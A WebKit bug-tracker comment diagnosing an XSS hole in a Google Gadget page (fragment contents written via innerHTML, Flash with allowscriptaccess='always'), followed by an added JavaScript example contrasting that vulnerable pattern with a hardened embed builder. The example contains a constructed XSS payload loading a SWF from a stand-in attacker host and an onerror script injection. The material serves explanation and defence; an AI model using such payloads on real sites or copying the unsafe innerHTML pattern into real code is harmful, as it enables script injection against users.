[Webkit-unassigned] [Bug 35802] Gadget embed blocked due to URL in content

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sat Mar 6 20:10:55 PST 2010

https://bugs.webkit.org/show_bug.cgi?id=35802

--- Comment #3 from Daniel Bates <dbates at webkit.org>  2010-03-06 20:10:55 PST ---
From briefly looking at the HTML source, this is an XSS attack since the page
<http://jujo00obo2o234ungd3t8qjfcjrs3o6k-a-sites-opensocial.googleusercontent.com/gadgets/ifr>
calls document.innerHTML with the contents of the anchor #up_embed_snippet.
Moreover, among the <object>/<embed> parameters passed is
allowscriptaccess="always", which would allow the flash content to execute
arbitrary JavaScript scripts. In this case, such scripts would execute with
respect to the domain for the iframe,
http://jujo00obo2o234ungd3t8qjfcjrs3o6k-a-sites-opensocial.googleusercontent.com.

I am not too familiar with Google Gadgets or its workings. Adam may have more
insight into this.

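The pattern the comment describes, as an added example that is not code from the gadget page named in the bug or from the Google Gadgets project: a snippet taken from the URL fragment is written straight into the document via innerHTML, and the embedded Flash content carries allowscriptaccess="always". The example contrasts that with building the embed from validated fields. The fragment encoding (a user pref named up_embed_snippet, URL-encoded), the host names and the size limits are assumptions made for the illustration.

```javascript
// Added example; not code from the gadget page in the bug report or from the
// Google Gadgets / Shindig project. It contrasts the reported pattern (fragment
// contents written via innerHTML, with allowscriptaccess="always") against
// building the embed from validated fields with script access switched off.

// Assumption: the snippet is carried as the user pref "up_embed_snippet" in the
// URL fragment, URL-encoded. The real gadget's fragment format is not shown on
// the page, so this parser is illustrative only.
function snippetFromFragment(hash) {
  const m = /(?:^#|&)up_embed_snippet=([^&]*)/.exec(hash);
  return m ? decodeURIComponent(m[1].replace(/\+/g, ' ')) : '';
}

// Vulnerable path: the returned string is exactly what the page would assign
// to container.innerHTML, so any markup in the fragment runs in the gadget's
// origin (the googleusercontent.com host named in the comment).
function renderUnsafe(hash) {
  return snippetFromFragment(hash);
}

// Minimal attribute-value escaping so a validated value cannot break out of
// its quoted attribute.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Only http(s) URLs are accepted as the movie source; javascript:, data: and
// unparsable strings are rejected.
function isHttpUrl(s) {
  try {
    const u = new URL(s);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch (e) {
    return false;
  }
}

// Hardened path: callers supply structured fields, never markup. The SWF URL
// must be http(s), sizes must be small positive integers (4096 is an assumed
// cap), and allowscriptaccess is fixed to "never" so the movie cannot call
// into the embedding document.
function renderSafe(fields) {
  if (!isHttpUrl(fields.src)) throw new Error('rejected src: not an http(s) URL');
  const w = Number(fields.width), h = Number(fields.height);
  const ok = (n) => Number.isInteger(n) && n > 0 && n <= 4096;
  if (!ok(w) || !ok(h)) throw new Error('rejected size');
  return '<embed type="application/x-shockwave-flash"' +
    ' src="' + escapeAttr(fields.src) + '"' +
    ' width="' + w + '" height="' + h + '"' +
    ' allowscriptaccess="never">';
}

// Constructed attacker payload: Flash with script access plus a plain HTML
// injection, both delivered through the fragment.
const attackerHash = '#up_embed_snippet=' + encodeURIComponent(
  '<embed src="http://attacker.invalid/x.swf" allowscriptaccess="always">' +
  '<img src=x onerror="alert(document.domain)">');

console.log('unsafe:', renderUnsafe(attackerHash));
console.log('safe:', renderSafe({ src: 'http://example.invalid/movie.swf', width: 400, height: 300 }));
```

The point of renderSafe is not the string building (in a real page you would create the element with document.createElement and set attributes, or use a proper HTML sanitizer) but that the attacker controls only a URL and two integers, each validated, and never the markup or the script-access policy.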